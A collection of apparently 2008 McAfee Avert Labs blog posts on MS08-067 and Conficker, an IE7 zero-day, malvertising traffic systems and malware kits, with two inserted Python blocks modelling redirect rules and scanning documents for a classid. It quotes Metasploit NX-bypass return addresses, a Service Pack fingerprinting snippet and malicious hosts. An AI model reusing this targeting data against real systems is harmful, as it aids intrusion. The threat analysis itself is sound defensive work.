Threats will continue to take evasive action against security measures. One example is the existence of single-use binary files, which are an attacker’s equivalent of a single-use credit card number used by consumers when shopping online. These binaries help to create a vast sea of threats, which will make it harder for victims to describe their assailants, and make it harder for defenders to catch them. Additionally, McAfee expects to see the continued expansion of malware in languages other than English. Cybercriminals have come to realize that by diversifying into a global market they can access even larger pools of valuable identity and confidential information.

Malware Targets Consumer Devices
McAfee expects increased attacks involving USB sticks and flash-memory devices used in cameras, picture frames, and other consumer electronics. This trend will continue due to the almost unregulated use of flash storage across enterprise environments as well as their popularity among consumers.

The Rogue Web and Malvertising
Last year McAfee also saw the malware underground use mainstream practices in an effort to “sell” software that was either misleading or outright fraudulent. McAfee expects this trend to continue as cybercriminals still see a lucrative market in this area.

McColo: The Effects of a Takedown
Spam traffic took a tremendous dive in volume when ISPs pulled the plug on spam host McColo Corp., the source of up to 60 percent of worldwide spam. In 2009, we will see a continued shift in organizations, from passive support of law enforcement to an active role of working collaboratively with ISPs and global Internet entities such as ICANN. Together, these organizations will shine the public light on these malicious actors and shut down their access to network and systems infrastructure.

Download the full report from our whitepaper page here.

Shrinking Patch Timelines – The Need For HIPS

Over the years, the window between exploit discovery and its incorporation into a worm candidate has shrunk from months, to weeks, to zero-day. This leaves administrators with very little time to schedule and deploy patches to all servers and workstations on their network. Virus authors, on the other hand, have been at the cutting edge of including exploit code in their creations whenever a critical vulnerability is reported. The chart below shows the time frame between a vulnerability being reported and how long it took for virus authors to incorporate it into a worm candidate.

Patch versus Worm Timelines

The year 2007 was the only exception in recent times for a worm not exploiting any critical Microsoft vulnerability.

It’s easy for an outsider to criticize or pass judgment on a network that was hit with a zero-day worm. Spare a thought for the IT administrator; most do not have the flexibility to deploy patches immediately to the network for policy reasons. For example, the organization could be using legacy software, which could break if a new service pack was applied. And keeping these legacy applications running takes precedence over applying the latest Windows hot fixes. Most system administrators, who work in hospitals and other mission critical jobs, don’t have the luxury of doing a Windows update!

To add to these woes, every once in a while a hot fix from Microsoft breaks something in the operating system or adversely affects other applications. Once a patch is rolled out via WSUS (Windows Server Update Services) it cannot be rolled back centrally, so a faulty patch from the vendor can prove costly for the organization. For these reasons administrators need more time to deploy these hot fixes in a test environment and QA them properly before deploying them to the enterprise.

So what can an administrator do in these circumstances? Relying solely on mainstream-antivirus desktop protection or firewall-style perimeter protection is insufficient to deal with today’s modern threats. The need of the hour is defense-in-depth. Administrators, who don’t have the luxury of applying patch updates, should seriously consider having a HIPS (host intrusion prevention system) installed on the end point to prevent exploit-based worm infections. Host intrusion prevention systems not only protect systems against zero-day vulnerabilities but also give administrators more time to test and deploy patches. The recent W32/Conficker.worm outbreaks could have been nipped in the bud if more organizations had chosen to protect their systems with HIPS.

Conficker Worm using Metasploit payload to spread

Recently we got some new samples of the W32/Conficker.Worm to analyze. While investigating we found that this worm has an exploit for the recent MS08-067 vulnerability and uses the exploitation method derived from the metasploit ms08_067_netapi module to spread itself. Below is the traffic packet capture snapshot sent by the worm:

As we can see from the image above, there are some random alphanumeric characters in the packet that seem to have been generated by Rex::Text.rand_text_alpha in ms08_067_netapi.rb. And if we do a byte-order conversion of the data in the red box above, we get three addresses: 0x00020408, 0x6f8917c2 and 0x6f88f807, which are the internal targets of the ms08_067_netapi.rb exploit as listed below (from Metasploit):

# Metasploit's NX bypass for XP SP2/SP3
[ 'Windows XP SP3 English (NX)',
  {
    'Ret'       => 0x6f88f807,
    'DisableNX' => 0x6f8917c2,
    'Scratch'   => 0x00020408
  }
], # JMP ESI ACGENRAL.DLL, NX/NX BYPASS ACGENRAL.DLL

The latest Metasploit exploit, besides covering the Windows XP/2003 operating systems, also includes several targets for languages such as English, Arabic, Czech, Danish, German, Greek, Spanish, Finnish, French, Hebrew, Japanese, Chinese, etc. The ms08_067_netapi exploit module in Metasploit also provides the smb_fingerprint() function to detect the Windows version, Service Pack and language of the target OS. This makes programming the worm much easier and can cause a much bigger impact. By using the exploit from the Metasploit module as the code base, a virus/worm programmer only needs to implement functions for automatic downloading and spreading. We believe that this can be accomplished by an average programmer who understands the basics of exploitation and has decent programming skills. After further analysis of the traffic capture, we found that only the functions for detecting the OS version and Service Pack information were embedded into this worm. Hence, without the remote OS language determination ‘feature’, this worm only targets English OS versions at the time of writing this blog.

Here is a packet capture snippet used in this malware to detect the OS version and Service Pack information:

By sending an SMB session setup request, the worm can detect the OS information of the target machine. If the OS is Windows Server 2003, the Service Pack information is also returned.

Since there are a huge number of Windows XP systems, it’s obvious that the worm writer did not want to miss out on this pool; hence the worm determines the Service Pack level by accessing the \SRVSVC named pipe, which is similar to the method used in Metasploit’s smb_fingerprint() function:

if (os == 'Windows XP' and sp.length == 0)
  # SRVSVC was blocked in SP2
  begin
    smb_create("\\SRVSVC")
    sp = 'Service Pack 0 / 1'
  rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e
    if (e.error_code == 0xc0000022)
      sp = 'Service Pack 2+'
    end
  end
end

So in this instance it’s obvious that malware/worm writers are abusing open source tools to their advantage to make their work easier.

For those who haven’t patched their machines, we suggest you install the MS08-067 patch ASAP! If you are a McAfee Host IPS or Network IPS user, we’ve verified that you are protected against this worm by our signature IDs 3961 and 0x40709d00 respectively. For VirusScan users, DAT update version 5444 has coverage to detect this worm.

Google Code Project Abused by Spammers

Google’s code-hosting project is the latest free service to be abused by web spammers. We’ve seen one or two cases previously, but over the holidays the situation appears to have got much worse. The spammers are creating lots of new projects with the following kind of page on them:

google code pic

Clicking the image will take you to today’s fake codec download site. Repeated clicks will take you to an adult site [both NSFW, you have been warned!].

The difference between this and the MSN Spaces abuse that is now about a year old is that Google appears to automatically index code projects, so any Google-Jedi can generate a good list (Google Search–again, don’t click the links) to start with.

Or the fact that the image is linked from http://bestsextube dot net/video.gif all the time might also be useful to know. ;) The icing on the cake, though, is the link to somewhere/in.cgi … I’ll come back to this later.

The porntube site is also host to a number of other related sites such as fake anti-anything software:

google code net pic

The codec download site, which is in Latvia, also hosts a number of related sites:

google code net pic

The Google Code project owner has a few other projects of a similar nature, too.

A year ago I blogged about MSN Spaces beta with a very similar issue… I even spoke to some very nice folks there about it, and a year later it’s still being abused by spammers [ spamhaus award. ] I trust Google would like to appear less evil and will take more decisive action. I’d suggest mashing code and safe browsing together, but it appears not to find anything wrong with the clickable links, though it did catch on after some redirection took place.

…perhaps I should start consulting on this sort of thing ;)

Anybody suffering déjà vu? “/in.cgi” should ring an alarm bell or two. If not, check out my colleague Micha’s blog on traffic management. He explains what happens to those clicks! This is campaign “6.”

Happy new year to all!

Inside The Malicious Traffic Business

The Web’s classical social-engineering trick of the “missing video codec” tries to lure people into clicking on links or downloading and installing an executable which pretends to be the missing application needed to watch the movie. The animated picture below is such an example: at first glance, it looks like a typical embedded video which is unable to load. The “picture” states that you’d have to click on it in order to see the movie. And here the lure begins – in this blog entry, we’ll follow it down and outline what kind of traffic management backbones are deployed for malware campaigns nowadays.

In our example the animated image is hosted on a popular blog platform and the link points to a suspicious Flash sample. As a quick analysis reveals, the Flash is compressed and additionally contains some obfuscated JavaScript code to hide its real intention. The script code redirects to another location.

The new location points to a so-called “Traffic Management System”. In this case, if you load the URL several times, the destination rotates and after too many retries you will always be redirected to the homepage of Google. The system remembers your IP address on the server side for a certain time period. After that time, or when you just use another IP address, you will again see the redirections when visiting the URL.

The redirections are based on a typical HTTP “302 Found” response with a new location from the server where the traffic management system is installed. Another example, which also used Geo-Location, was outlined in this Avert Labs Blog post where a downloader trojan contacted such a system and based on the country, different malware binaries were downloaded.

Such traffic management systems nowadays are configured via web-based administration interfaces. Typically the links for the “incoming traffic” look like http://www.example.com/in.cgi?three or http://www.example.com/in.cgi?default where “three” or “default” stands for different campaign IDs inside the system. A typical rule could look like shown in the following picture.

The administrator is able to define rules for “incoming traffic” which result in different “outgoing traffic” based on different restrictions. For example, the Geo-Location could be used to redirect visitors from a particular country to one location while visitors from another country will be redirected to a different location – just think of localized campaigns targeted to the spoken language in these countries. So users from the United States will not be redirected to a French phishing web site and vice versa.

These traffic management systems can also use more complex rules based on network ranges and the referrer – so let’s say that only visitors with a referrer from Google will be redirected to a malicious web site, as long as the IP address of the visitor doesn’t come from well-known network ranges belonging to security companies.

Why do that? This way, only users searching for the website will get to the malicious redirect, while the website’s owner or administrator, who usually does not search for it but directly enters the URL into the browser, will see the normal website with no oddities. This helps the attacker to keep the infection under the radar for a longer time.
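The practical consequence for an analyst is that a single fetch of a reported URL proves little. The following Python is an added model of the rule types described above (geo-location, referrer, excluded vendor ranges and the per-IP retry memory), written here to show which request contexts expose the redirect and which see the benign page; it is not the page’s or any real system’s code, serves no HTTP, and all rules, ranges and URLs in it are constructed.

```python
from collections import defaultdict
from dataclasses import dataclass
from ipaddress import ip_address, ip_network
from typing import Optional

BENIGN = "https://www.example.com/"      # what the site owner (direct entry) sees
FALLBACK = "https://www.google.com/"     # served once an IP has used up its redirects


@dataclass
class Rule:
    campaign: str                         # the "three"/"default" part of in.cgi?<campaign>
    country: Optional[str]                # None = any country
    referrer_contains: Optional[str]      # None = any referrer (including none)
    target: str                           # outgoing location for matching traffic


# Constructed rule set and "known security vendor" range; nothing here is real.
RULES = [
    Rule("three", "US", "google.", "http://us-landing.example/codec.exe"),
    Rule("three", "FR", "google.", "http://fr-landing.example/codec.exe"),
]
SECURITY_RANGES = [ip_network("203.0.113.0/24")]
MAX_HITS_PER_IP = 3
MEMORY_SECONDS = 600


class TrafficManager:
    """Model of the server-side decision, for reasoning about analyst blind spots."""

    def __init__(self, rules, excluded_ranges, max_hits, memory_seconds):
        self.rules = rules
        self.excluded = excluded_ranges
        self.max_hits = max_hits
        self.memory = memory_seconds
        self.seen = defaultdict(list)     # ip -> timestamps of redirects served

    def _match(self, campaign, country, referrer):
        for r in self.rules:
            if r.campaign != campaign:
                continue
            if r.country and r.country != country:
                continue
            if r.referrer_contains and r.referrer_contains not in (referrer or ""):
                continue
            return r
        return None

    def handle(self, campaign, ip, country, referrer, now=0.0):
        """Return the (status, location) pair a visitor with this context receives."""
        if any(ip_address(ip) in net for net in self.excluded):
            return 200, BENIGN            # vendor ranges never see the redirect
        rule = self._match(campaign, country, referrer)
        if rule is None:
            return 200, BENIGN            # e.g. the owner typing the URL: no referrer
        recent = [t for t in self.seen[ip] if now - t < self.memory]
        recent.append(now)
        self.seen[ip] = recent
        if len(recent) > self.max_hits:
            return 302, FALLBACK          # IP remembered: rotate it off to Google
        return 302, rule.target


def analyst_views(tm, campaign, contexts, now=0.0):
    """Replay several request contexts and report what each one is shown."""
    return {label: tm.handle(campaign, ip, country, referrer, now)
            for label, ip, country, referrer in contexts}


# Constructed contexts an analyst might try; only some reach the redirect.
CONTEXTS = [
    ("owner direct entry", "198.51.100.7", "US", None),
    ("US visitor from Google", "198.51.100.8", "US", "https://www.google.com/search?q=free+codec"),
    ("FR visitor from Google", "198.51.100.9", "FR", "https://www.google.fr/search?q=codec"),
    ("vendor sandbox from Google", "203.0.113.9", "US", "https://www.google.com/search?q=codec"),
]

if __name__ == "__main__":
    tm = TrafficManager(RULES, SECURITY_RANGES, MAX_HITS_PER_IP, MEMORY_SECONDS)
    for label, (status, location) in analyst_views(tm, "three", CONTEXTS).items():
        print(f"{label:28s} -> {status} {location}")
```

Reproducing a report therefore means varying referrer, apparent country and source address, and fetching from an address the system has not seen within its memory window.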

Other traffic management systems, like the one shown in the above picture, also feature different logins to the web interface – for the administrator, the “sellers” and the “buyers”. This particular system has different views for sellers of traffic – that is, infected web sites containing an IFRAME that points to the traffic management system – and buyers of traffic – e.g. the people who run exploit servers and try to install malware on unpatched computers, thus looking for potential victims. Such traffic management systems sit between the infected web sites and the exploit servers. As you can see in the above picture, payment options can also be configured, so the more traffic a seller redirects to a buyer, the more money is paid. With such systems in between, the campaigns can easily be exchanged or the “traffic” can be sold to new buyers who try to install their malware.

So the classical starter, the “missing video codec” trick, can end up in quite a complex system managing modern malware campaigns. Visiting or following a malicious resource nowadays means that you are redirected based on a complex server-side management system.

25C3: Nothing to Hide

The last major event of the year has just ended: The 25th Chaos Communication Congress’ Closing Ceremony just took place. Now in its 25th year, making it one of the oldest annual IT security conferences on the planet, more than 4,000 visitors crowded the BCC in Berlin, making it difficult to get into the talks, much like at Defcon some years ago.

For the talks: As always there was a healthy mix of technical, culture, and society-related topics (the full schedule can be found here); surprising was the low number of local speakers talking about security problems or releasing tools. This may be related to a lot of confusion about the impact of recent German legislation banning “hackertools.” Recordings of all talks will eventually be available here.

Some of the highlights of the conference (yes, with four days and three parallel tracks I’m certainly missing some that should be mentioned) were Security Failures in Smart Card Payment Systems, by Steven Murdoch; Fabian Yamaguchi’s talk about TCP DoS Vulnerabilities; SWF and the Malware Tragedy, by BeF and fukami; FX of Phenoelit talking about the State of Attack/Defense of Routers (start watching your infrastructure, folks!) and finally the conference highlight, a talk about creating a rogue CA Certificate, by David Molnar, Marc Stevens, Benne de Weger, Arjen Lenstra, Dag Arne Osvik, Jacob Appelbaum, and Alex Sotirov. By taking advantage of known (and widely ignored) weaknesses of MD5-signed certificates and a bad implementation at a CA, they were able to create a Rogue CA Certificate, trusted by all browsers–OUCH!

A very interesting note concerning the Rogue CA talk: They didn’t give out any details on what they were planning to talk about until just before the talk itself. As they were afraid that someone or some company might try to gag them and prevent the talk from happening, they discussed the content with affected parties only under NDA. Meaning: They made the other party sign the NDA, not the usual way around!

This year there were a number of talks about mobile phone (in)security and about the GSM network in general, an interesting trend to follow in the next months/years. And at the very end a vulnerability affecting many Symbian-based phones, trivial to exploit manually, had been released: SMSCurse (I’ve got no working link at the time of this writing). It basically crashes the SMS messaging on a phone and may require factory reset to restore it, depending on the phone.

I took this as an opportunity to create a current backup of my phone–how old is your latest backup? :)

Have a Happy and Safe New Year!

IE 7 Exploit Reloaded: The new face of Drive-by Attacks using Doc files

Recently we blogged about an unpatched Internet Explorer 7 exploit in the wild. With the vulnerability information made public, McAfee Avert Labs has noticed a spike in the number of active websites hosting this exploit. Lately we are seeing customized versions of the IE 7 exploit with varying degrees of obfuscation.

Malware authors have been coming up with innovative mechanisms to leverage this exploit to social engineer the not so tech-savvy Internet users. One of the most prominent and unique techniques adopted by the malware authors involves a Microsoft Word document being sent out to an unsuspecting user.

Upon opening the Word document, the embedded ActiveX control with the following classid is instantiated and executed.

  • {AE24FDAE-03C6-11D1-8B76-0080C744F389}

This control stores configuration data for the policy setting Microsoft Scriptlet Component.

ActiveX

The control then makes a request to the webpage hosting the IE 7 exploit. The charm with this approach is that the exploit is downloaded and run without the knowledge or permission of the user. To the unsuspecting user it will just appear as yet another normal Doc file.
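One defensive check this enables is scanning inbound Office documents for that classid before they reach users. The following Python is an added example (not McAfee’s or the page’s code) that searches a document blob for the CLSID in the three forms it can take in an OLE file: the 16-byte binary GUID layout, ASCII text and UTF-16LE text; the sample document is constructed, and only the CLSID itself comes from the post.

```python
import uuid

SCRIPTLET_CLSID = "AE24FDAE-03C6-11D1-8B76-0080C744F389"   # from the post


def clsid_patterns(clsid_text):
    """Every byte form of a CLSID worth searching a document for.

    OLE streams store the GUID in COM layout (first three fields little-endian),
    which uuid.bytes_le produces; textual forms appear in either case and,
    because Office strings are Unicode, often as UTF-16LE."""
    u = uuid.UUID(clsid_text)
    upper, lower = "{%s}" % str(u).upper(), "{%s}" % str(u).lower()
    return {
        "binary (COM GUID layout)": u.bytes_le,
        "ascii text (upper)": upper.encode("ascii"),
        "ascii text (lower)": lower.encode("ascii"),
        "utf-16le text (upper)": upper.encode("utf-16-le"),
        "utf-16le text (lower)": lower.encode("utf-16-le"),
    }


def find_clsid(blob, clsid_text=SCRIPTLET_CLSID):
    """Return [(form, offset), ...] for every occurrence, ordered by offset."""
    hits = []
    for form, needle in clsid_patterns(clsid_text).items():
        start = 0
        while (i := blob.find(needle, start)) != -1:
            hits.append((form, i))
            start = i + 1
    return sorted(hits, key=lambda h: h[1])


def scan_file(path, clsid_text=SCRIPTLET_CLSID):
    """Convenience wrapper for a document on disk."""
    with open(path, "rb") as f:
        return find_clsid(f.read(), clsid_text)


# Constructed stand-in for a .doc: OLE2 magic, padding, the CLSID as the
# compound file stores it, then the same CLSID as lower-case UTF-16LE text.
SAMPLE_DOC = (
    b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 24
    + uuid.UUID(SCRIPTLET_CLSID).bytes_le
    + b"\x00" * 16
    + "{ae24fdae-03c6-11d1-8b76-0080c744f389}".encode("utf-16-le")
    + b"\x00" * 8
)

if __name__ == "__main__":
    for form, offset in find_clsid(SAMPLE_DOC):
        print(f"Scriptlet Component CLSID found as {form} at offset {offset}")
```

A hit is a reason to quarantine and inspect, not proof of exploitation on its own; the binary form in particular also appears in legitimately embedded controls.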

Microsoft has issued workarounds to block known IE 7 exploit attack vectors. We want to reiterate to all our readers to be vigilant and cautious while opening unknown Doc files or visiting dubious websites, while we continue to monitor the threat and protect our customers against the menace.

Downloader Trojan Exploits Hole in IE 7

We have lost count of how many blogs we have written this year that have anything to do with zero-day threats or unpatched vulnerabilities.

Today, many Internet users in China have reported an infection, presumably from browsing the web using a fully patched version of Microsoft Internet Explorer 7.x. My colleague Xiaobo Chen and I investigated the incident and found it to be an active exploit containing downloader shellcode that installs the Downloader-AZN Trojan (proactively detected as New Malware.n since 2005 when scanning with heuristics enabled).

The root cause was found to be the incorrect handling of certain XML tags in Internet Explorer 7.x, which references already freed memory in mshtml.dll.

We have confirmed this vulnerability to be affecting, at least, a fully patched Windows XP SP3 and a Vista SP1 system. The exploit uses publicly known heap-spray techniques that enable control over a vtable pointer, allowing arbitrary code execution.

Fortunately, the 5404 DATs proactively detect the Downloader-AZN Trojan, but there could be other variants. Additional coverage is going into today’s DATs to detect the malicious web scripts as Exploit-XMLhttp.d or Exploit-XMLhttp.c Trojan.

Details about this vulnerability, as well as exploit code, are known to be publicly available.

More information on this situation will be posted as it becomes available.

McAfee Releases Virtual Criminology Report, Edition 4

Today McAfee released its Virtual Criminology Report, our annual study of global cybercrime. We found that cybercriminals are targeting their scams to play off of the economic recession, and governments need to be doing more collaboration to face the problem.

The economic downturn affected cybercrime scams almost immediately. As soon as banks started struggling and mergers and acquisitions became commonplace, we started seeing an immediate increase in banking scams asking users to ‘update their account information’ before the bank changed hands. With almost all of today’s malware being financially motivated, even cybercriminals are looking for more business in tough economic times and are really stepping up their game.

This represents an evolution in the trend of cybercriminals getting smarter and faster about what they do. When news of a specific bank going under hits, scams and malware utilizing that messaging will emerge the very next day. The same happened with threats throughout this year’s presidential race as well as post-election; malware using President-Elect Barack Obama messaging emerged as early as November 5.

The environment of fear and anxiety in consumers that is being caused by the downturn also provides opportunity for cybercriminals to lure consumers into what they think are ‘internet sales marketer’ positions, where they are actually unknowingly assisting in criminal activity as money launderers. We have been seeing an increase in the number of these job postings and recruitment emails promising job seekers will ‘get rich quick.’ The scams are also strategically worded to place high on Google job searches, and are of course designed to look like legitimate job postings.

It is more important than ever that computer users educate themselves in safe searching and safe computing habits. Technology alone cannot solve the problem. Education alone cannot solve the problem. Both combined, however, can enable us all to use the Internet the way we want.

Download your copy of the report here.

Educate. Advocate. Protect.

Further MS08-067 Woes

MS 08-067 worm

A picture is worth a thousand words…

First let me say, “PATCH your systems” if you have not done so already!

Seriously, you and your machines are sitting ducks for attacks such as MS08-067, which we learned about from Microsoft last month. This type of attack is especially dangerous if your Windows Updates or security products are not up to date. Microsoft released its out-of-cycle emergency patch on the 23rd of October–more than one month ago–so you have no excuse today for being at risk!

At McAfee Avert Labs we have seen a few proof-of-concept binaries using the exploit code that was released into the wild to attack this Windows Server Service vulnerability; the latest is W32/Conficker.worm. According to the description in our Virus Information Library, W32/Conficker.worm decides how it will load itself as a Windows Service depending on whether the compromised version of Windows is Windows 2000.

Once loaded in the service space, the worm attempts to download files from the Internet–specifically, further malware from trafficconverter.biz and data files from maxmind.com.

The worm continues by setting up an HTTP server that listens on a random port on the victim’s system while hosting a copy of the worm. It then scans for new vulnerable victims to exploit, at which point the new victim will download the worm from the previous victim and so on.

To recap McAfee’s coverage and protection for this vulnerability, please check here. We have increased coverage in today’s DATs (Version 5445) to protect against this and future variants of W32/Conficker.worm.

For more information on the Microsoft vulnerability, refer to their security bulletin.

As many of us enter the holiday season of Thanksgiving it’s vital to ensure your systems are patched and up to date while you’re enjoying your time off. Malware doesn’t break for holidays! ;)

Secure Computing Links With McAfee Avert Labs

Today marks another day of momentous change for McAfee’s research teams.

I just spent two days with my new colleagues from Secure Computing and some of my team members from McAfee Avert Labs. It was two grueling days of discussion and education as we both came up to speed on our research methodologies and technologies. Let me say that I am truly excited to be working with Dmitri Alperovitch, Sven Krasser, and Paula Greve, who head up the research group there. These are sharp and capable research leaders who have done amazing things. TrustedSource is a great technology and has so many applications that McAfee can leverage. Once our new Artemis technology begins to leverage TrustedSource capabilities McAfee will become the undisputed leader in security intelligence in the Internet “cloud.” Together we will see millions of spam messages, evaluate thousands of web sites, and see thousands of new pieces of malware–all in the span of 24 hours. We now have the ability to see and react to the threat landscape better than ever before. This is something that every McAfee product, technology, appliance, and SAAS (software as a service) solution will come to leverage, differentiating themselves from the competition even more.

At first we thought we would have overlapping technologies, but this is definitely not the case. In combating spam, web, and malware we have approached these threats from very different directions; thus we find our technologies very complementary. In the case of anti-spam protection, for example, we have two technologies that provide better than 99% detection using very different methodologies and approaches. Once combined, we will have the most robust solution on the market. The same holds true for the SmartFilter and SiteAdvisor technologies, as well as our malware solutions.

Today we have very good security intelligence. Tomorrow, with a bit of nurturing, we will have great security intelligence.

We welcome Secure Computing to the McAfee research family.

Jeff Green
Senior Vice President
McAfee Avert Labs

Exploit-MS08-067 Bundled in Commercial Malware Kit

Probably the most widely reported topic in the Chinese security community this month will be the availability of a commercial MS08-067 attack pack, customized for Chinese users. On October 26th, 2008, exploit code was posted to a well-known public repository site. Within a few days, the malware kit author WolfTeeth was quick to sell an MS08-067 port scanning tool with attack capability to his “customers”, using free code from the Internet.

WolfTeeth

Taking a peek into his “malware shop”, one finds a series of malware kits for sale – including a BackDoor kit (a.k.a. Beetle Remote Control Kit). It offers features similar to BackDoor-AWQ, another commercial kit that was also notoriously sold on a Chinese website. Both kits offer a free version and a commercial version with enhanced features including:

  • Kernel rootkit.
  • Anti-virus software termination.
  • Weekly anti-virus detection monitoring and evasion service.
  • Web DDoS attack option (using a method to target webservers with expensive HTTP requests, such as those of an active web application site).

The seller invites interested “customers” to contact him for a quote, but on another page he has publicly priced an AdClicker trojan kit at CNY258 (~USD$37.80). This kit allows his “customers” to make money from pay-per-click sites using infected machines. Similarly, this kit claims “advanced” features to terminate popular anti-virus software in China, download updates and stay stealthy.

AdClicker for Sale Site

Oh, wait, he also posted a disclaimer to remind all “customers” that his tools must never be used for “legal purposes” and are sold for “research use” only. As customer service, he has also warned his “customers” about “trojanized” versions of his kit distributed by others on the Internet, which will install a backdoor to spy on the backdoor user.

This malware shop is hosted on a domain registered very recently, on October 16th, 2008 to someone by the name of Wang Zeyu, possibly from Nanjing, China. Since the release of the tool, it has gained some attention from the mainstream Chinese media.

McAfee Avert Labs detects the toolkit as Exploit-MS08-067 (Generic.dx in older DATs), and the dropped exploit and port scanning tool as Exploit-MS08-067 trojan and Tool-TCP Scan application.

2008 Presidential Malware review

Following on from Pedro’s blog yesterday [Election day is over] and the recent news that the computers of both campaigns were hacked during the summer [Security focus blog], I wanted to give you a short overview of the different malware we saw here at McAfee Avert Labs during the US Presidential race.

Due to the high media attention which Barack Obama received, it seems that the malware authors specifically targeted him instead of John McCain as a means of luring users into clicking on the malware.

One of the first pieces of malware we saw which exploited the campaign was in August. This was a spammed email which contained a link to get_flash_updates.exe. The email contained the subject “Obama bribes countrymen to win votes”; if the user followed the link it would download Get_Flash_updates.exe, which was a BackDoor-DNM Trojan.

The above was similar to a spamming campaign which Alex Hinchliffe blogged about earlier on this year [Super Wednesday].

A few weeks later we received a file called Obama_*.exe (I renamed the file due to it containing offensive language) which was detected as PWS-Banker.cs. The file used the Window Media Video icon and upon execution dropped the following file: %WinDir%\system32\siemens32.dll. The malware also loaded a video in order to make the user believe that it was in fact a video file.

Yesterday we received a file named BarackObama.exe which Pedro blogged about [Election day is over]. We also went Low Profile on the Generic PWS.y!6F939359 which was being talked about on several different sites [Washington Post] [NetWork World].

Finally, today we also received a new one which was named Beat_Obama_178.exe. This was a simple downloader which attempts to download a file from a Chinese website. This will be detected as Generic Downloader.Z in tomorrow’s DAT release.

We expect to see several more malicious files using the US Presidential election as a means of social engineering in order to trick users into executing them. So please be on the lookout and keep your security software up to date.

First Glimpse into MS08-067 Exploits In The Wild

It has been over 2 years since I last wrote about malware exploitation of a major vulnerability in the Windows Server Service (MS06-040).

In 2006, worm authors were quick to adopt the remotely executed exploit just 4 days after a security update released as part of the regular Patch Tuesday – IRC-Mocbot, W32/Sdbot, W32/Spybot, W32/Opanki, etc.

Now in 2008, we are faced with malware authors who are motivated by profit, more organized, and more likely to target zero-day vulnerabilities, as we have reported on several critical incidents discovered since 2006. Like déjà vu, Microsoft released an out-of-cycle security update today to address in-the-wild attacks against a new MS08-067 vulnerability targeting the same Windows Server Service.

Attacks seen in the wild so far seem to have come from variants of the Spy-Agent.da trojan. When run, it may not be immediately apparent to the victim that it was using any exploits. Taking a quick glimpse into the binary code of basesvc.dll (Spy-Agent.da.dll), one of the DLL components installed by Spy-Agent.da, one can see strings that would look very familiar to those familiar with MS06-040.

MS08-067 strings

On closer analysis, Spy-Agent.da.dll seeks out potentially vulnerable Windows machines in the local network, and sends maliciously crafted DCERPC requests to exploit the Server Service (SvrSvc).

MS08-067 exploit

When successful, hardcoded shellcode embedded within the malware is executed on the targeted machines to download Spy-Agent.da (or possibly other variants or files) from a web server hosted in Japan.

MS08-067 shellcode
(shellcode after decoding)

Just hours after the patch release, public source code has already been seen being distributed on the Internet. What more can I say? Patch your systems! Yes, NOW!

Spy-Agent.da and Spy-Agent.da.dll are now detected using the current 5414 DATs. See Dave’s blog for McAfee’s coverage.

(thanks to Joey Koo and Xiaobo Chen for providing analysis data and packet dumps used in this blog)

McAfee Coverage of the Microsoft Emergency Release

Due to the MS08-067 out-of-cycle release from Microsoft today we are in the process of releasing emergency DATs/coverage updates for many of our products and technologies. We are also working on an emergency Security Advisory as well.

Current state for each of the content areas is as follows:

Malware – Emergency DAT cut and testing in progress. ETA of 2 – 3 hours.

HIPS – Generic buffer overflow should provide coverage.

Intrushield – Partial existing coverage. Additional emergency sigset releasing today.

Foundstone – Emergency signatures being released today.

V-Flash – Emergency signatures being released today.

MNAC – Emergency signatures being released today.

VirusScan Enterprise BOP – Should provide coverage for the buffer overflow.

We will continue to monitor this critical event to provide the most comprehensive coverage we can.

McAfee Security Journal Released!

Issue 5 of the publication formerly known as Sage has been released. This issue we take aim and tackle the rather murky subject of social engineering. We have nine excellent articles for you from some of our finest researchers as well as two academic experts. Some of the topics covered include:

The Origins of Social Engineering
Social Engineering 2.0 – What’s Next?
Vulnerabilities in the Equities Markets
The Future of Social Networking Sites
Typosquatting – Unintended Adventures in Browsing

Many aspects of social engineering are dissected and investigated as well, some not found anywhere else! Definitely worth the download and read.

Available here.

Porn for Free: Puper Promises Hot Videos on YouTube

YouTube is an excellent resource for video sharing: Users can upload, view, and share video clips. It’s also not novel to find a legitimate web site being used as a vector to spread porn-spewing malware. We blogged earlier about fake video embedded in blogspot domains and attackers capitalizing on sensational news hitting the media. This time attackers are promising free adult video on YouTube to assault unsuspecting users.

Attackers are using fake profiles that contain a video link to YouTube to kick-start an infection. This profile contains a link pointing to:

http://superelection[blocked].info

The preceding web site is infamous for various U.S.-election-related spam and hosts a cocktail of exploits that attempt a drive-by installation on the victim’s machine. The site also attempts to social engineer the victim by promoting a fake codec that installs the Puper Trojan. We have identified multiple profiles connecting to various exploit-serving sites hosting the fake codec. The attackers have been successful in promoting this attack by posting the YouTube links to various forums. With numerous visits to this YouTube link so far, the chances are good that a number of users have fallen victim to this attack.

We advise all Internet users to follow safe browsing practices and keep their systems patched. Meanwhile we at McAfee Avert Labs will continue to protect our customers against such attacks.

Zero-Day Exploit Strikes QuickTime 7.5.5, iTunes 8.0

A zero-day exploit against the latest QuickTime (Version 7.5.5) and iTunes (8.0) was released yesterday. The exploit author announced this as a remote heap overflow so we decided to take a look and analyze it.

After our research, we found that this is actually an off-by-one stack overflow. Some noteworthy points:

1. QuickTime has the /GS switch option enabled, hence a cookie is put into the stack.

2. Since this is an off-by-one stack overflow, the attacker can overwrite only one byte of the cookie. The Check_stack_cookie function is called when the function returns. If Check_stack_cookie finds that the cookie does not match, the program exits. This results in the crash of QuickTime and iTunes.

The crash means it is unlikely that code execution would be feasible via this attack vector. However, users of these apps should take the attack seriously and look at appropriate defenses.

Secure Your Wireless Router Part 2

I was at a friend’s house this past weekend when I asked to connect to his wireless router with my laptop. This friend was not computer savvy so I wasn’t surprised to find that security was not configured on his router.

This reminded me of an article (Secure Your Wireless Router) a colleague of mine at Avert Labs had written several months ago about how more and more homes in China nowadays have wireless routers, but very few people bother to secure their routers.

I proceeded to lecture my friend about the importance of being security-aware, and the dangers of not being so – identity theft, stolen passwords, private documents, pictures, etc.

To demonstrate my point, I asked his permission to perform a penetration test which he agreed to.

I proceeded with the same steps described in my colleague’s article. I obtained an IP on the unsecured network, found the router’s IP, opened up a browser to that IP and was presented with the router’s administration login page. A quick search online easily gave up the default admin password for this router – “admin”. I tried that and sure enough, got into the admin page.

